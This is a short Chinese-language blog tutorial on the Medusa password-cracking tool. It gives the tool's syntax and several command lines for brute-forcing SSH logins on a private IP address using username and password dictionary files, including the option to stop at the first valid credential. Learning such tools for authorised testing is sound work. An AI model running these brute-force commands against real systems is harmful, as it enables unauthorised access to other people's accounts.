语法
mudusa -h
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]命令详解:
-h: 目的主机IP
-H: 文件(有多个目标时,可以将IP放到一个文件中)
-u: 单个用户名
-U: 用户名字典文件
-p :单个密码
-P: 密码文件
-M: 模块
指定用户名的密码破解
如果用户名和协议都是已知的,我们可以使用medusa来破解密码。
命令如下:
medusa -h 192.168.50.1 -u priess -P /root/zi.txt -M ssh
账号和密码破解
用户名和密码都未知,命令如下
medusa -h 192.168.50.1 -U user.txt -P pass.txt -M ssh在这里,我们使用 -U 选项作为用户名文件,-P 选项用于密码文件,-h 选项用于主机名。
显示模块使用信息
您可以使用新选项 -q,它将显示模块的使用信息。这应该与-M选项结合使用。
medusa -h 192.168.50.1 -U user.txt -P pass.txt -M ssh -q
成功立停
使用上述命令时,尽管我们获得了正确的用户名和密码,但攻击将继续进行,当用户名和密码列表很长时,这可能会需要很长的时间。因此为例解决这个我们只需要添加参数-f即可
medusa -h 192.168.50.1 -U user.txt -P pass.txt -M ssh -f
版权属于:逍遥子大表哥
本文链接:https://blog.bbskali.cn/3409.html
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
此处评论已关闭